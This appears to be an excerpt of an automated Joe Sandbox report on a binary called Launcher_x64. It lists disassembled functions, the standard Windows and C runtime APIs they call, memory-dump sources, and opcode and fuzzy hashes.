                                                                                                                                                                                                                                                                                        • Instruction ID: 522ea74b8b8b92e257baff6af0a9a0c4aa5246b3de6ef5b88db5fe28b39ccf13
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b1de6dcd2ea6e13a96e612734968aa3b157ff8699488378ad0d574931ebb3bd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E851DD72640226BFEF219FA0EC81EBB7BA9EFA471CB194528FD04D6141EB34DD508674
                                                                                                                                                                                                                                                                                        Function 00D15C7F Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D15C93
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CB2
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CE0
                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D3B
                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D52
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 66001078-0
                                                                                                                                                                                                                                                                                        • Opcode ID: be4f5f76c6600673f5e90b10474af0180d5d624034890ce13cdf471623fb29e8
                                                                                                                                                                                                                                                                                        • Instruction ID: 2fe007ec2ae3b29919d6f1aa116782c170f3e5f779d7c66d72c429cc5533a3a9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be4f5f76c6600673f5e90b10474af0180d5d624034890ce13cdf471623fb29e8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18412935500B06EBCB20DF65F488AEAB7F5FB85310B544A1AD446D7658DB38E9C1CB70
                                                                                                                                                                                                                                                                                        Function 00D12956 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00D1295D
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D12968
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D129D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D12877
                                                                                                                                                                                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00D12983
                                                                                                                                                                                                                                                                                        • _Yarn.LIBCPMT ref: 00D12999
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f14c2ab57d90c711de591b0ea83c426453b99cf7d8420bd6d91a8f1613fa77ad
                                                                                                                                                                                                                                                                                        • Instruction ID: 76a489a8c026fec7fe1efccbbe83307c7f3a98cb3c21ae488df55c89ac1a9501
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f14c2ab57d90c711de591b0ea83c426453b99cf7d8420bd6d91a8f1613fa77ad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83017C79A40214AFCB06AF20E8429BD7B62FF85350B194008E81197391DF35AE92CFB5
                                                                                                                                                                                                                                                                                        Function 00D2DD31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094), ref: 00D2DD3E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094,00000000,?,00D22E6C), ref: 00D2DD48
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D2DD70
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                                        • Opcode ID: 44e5ac9e205425dcefed4b7b1ea7d3c8b159f58776e3b261bc9e4b5d3173b01e
                                                                                                                                                                                                                                                                                        • Instruction ID: cf411c10601e986497639e82e497d116099122be281abcf075aec81f74ba3b21
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44e5ac9e205425dcefed4b7b1ea7d3c8b159f58776e3b261bc9e4b5d3173b01e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE04F702C4B05BBEB202B61FC0AB693B57AF20B45F184470F90CE81E1E762A825DD74
                                                                                                                                                                                                                                                                                        Function 00D2B0D7 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(E7FA7683,00000000,00000000,?), ref: 00D2B13A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D2B38C
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D2B3D2
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D2B475
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 91efc4b3dc349f036759e78655448f343bff0943902e5ea2ff66c91b96fae4f7
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c8200099cb4d16fa262b94707e7af5a60e1da973d7b80af90394719c6045eb7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91efc4b3dc349f036759e78655448f343bff0943902e5ea2ff66c91b96fae4f7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2ED18DB5D00258DFCB05CFA8E8909ADBBB5FF59318F18412AE456EB352D770A942CF60
                                                                                                                                                                                                                                                                                        Function 00D2254D Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 37169549c7c5aa0f6cf29ecd41a60a588bce80b72d7210bf3fd30d84fbfd85d8
                                                                                                                                                                                                                                                                                        • Instruction ID: e5e3a1b0967f8f95088b792858323ecb41f83be010375803340e090a0ee549c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37169549c7c5aa0f6cf29ecd41a60a588bce80b72d7210bf3fd30d84fbfd85d8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3251F572504222BFDB248F14F841BBA73A5FF64719F184529F851872A1DB31ED94DBB0
                                                                                                                                                                                                                                                                                        Function 00D28F03 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D28F67
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28F6E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D28FA8
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28FAF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1c90443f78bdb872189eb8fbe34f563a4bf85e0364e26e584cb1ce7ae44292e7
                                                                                                                                                                                                                                                                                        • Instruction ID: 84c9c3a8e16057573887fa0971a1fe60e7f2e816bb19d5465881b647f67841cf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c90443f78bdb872189eb8fbe34f563a4bf85e0364e26e584cb1ce7ae44292e7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19210431205325BFDB10EF61F98086BB7AAFF243687048518F82987290DF30ED40ABB0
                                                                                                                                                                                                                                                                                        Function 00D197A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 1a013f09fc2fa8644d2ab08403b7f9f86a0b062ac2a26ebecda1dd6ade13177c
                                                                                                                                                                                                                                                                                        • Instruction ID: 6a55163133050529413693b7ee9cf764962d4ccec5a9553350c2c02c323ae4f9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a013f09fc2fa8644d2ab08403b7f9f86a0b062ac2a26ebecda1dd6ade13177c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A216F71204205BF9B10AF65A8B1DEAB7A9FF45364B144528F85697251EF30EC90CBB0
                                                                                                                                                                                                                                                                                        Function 00D2A2F9 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00D2A301
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A339
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A359
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c03f7d3827e309fc9e415943fc332ade3fc2625416bb2ddceaf4e9624d38a986
                                                                                                                                                                                                                                                                                        • Instruction ID: bd63b618c3b535bb1dcd6fd3c5957e130e0d34b04d949a7a2a4ce0f4e8052a90
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c03f7d3827e309fc9e415943fc332ade3fc2625416bb2ddceaf4e9624d38a986
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A11A1B19053367FA71277F97C89C6F7A9CEF643AC3140124F401D1100FA28DE118576
                                                                                                                                                                                                                                                                                        Function 00D14399 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00D143A0
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D143AA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::_Lockit.LIBCPMT ref: 00D04DBE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00D04DE9
                                                                                                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 00D143E4
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D1441B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3ffe4eb0d84028237219adc892bac6fc0f81955bf8b3268a41265473ac276aac
                                                                                                                                                                                                                                                                                        • Instruction ID: f945cd6f37ff4495ce8465d36ee8b8d5cefd69e773a097a0933bc13a6d962948
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ffe4eb0d84028237219adc892bac6fc0f81955bf8b3268a41265473ac276aac
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6801A179900219ABCB05EB64F805BED7B61EF84724F244508F410A73D1CF709E80CBB0
                                                                                                                                                                                                                                                                                        Function 00D321E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000), ref: 00D321F7
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?,?,00D2AE0F,?), ref: 00D32203
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D32254: CloseHandle.KERNEL32(FFFFFFFE,00D32213,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?), ref: 00D32264
                                                                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 00D32213
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D32235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D321D1,00D316BC,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32248
                                                                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32228
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2744216297-0
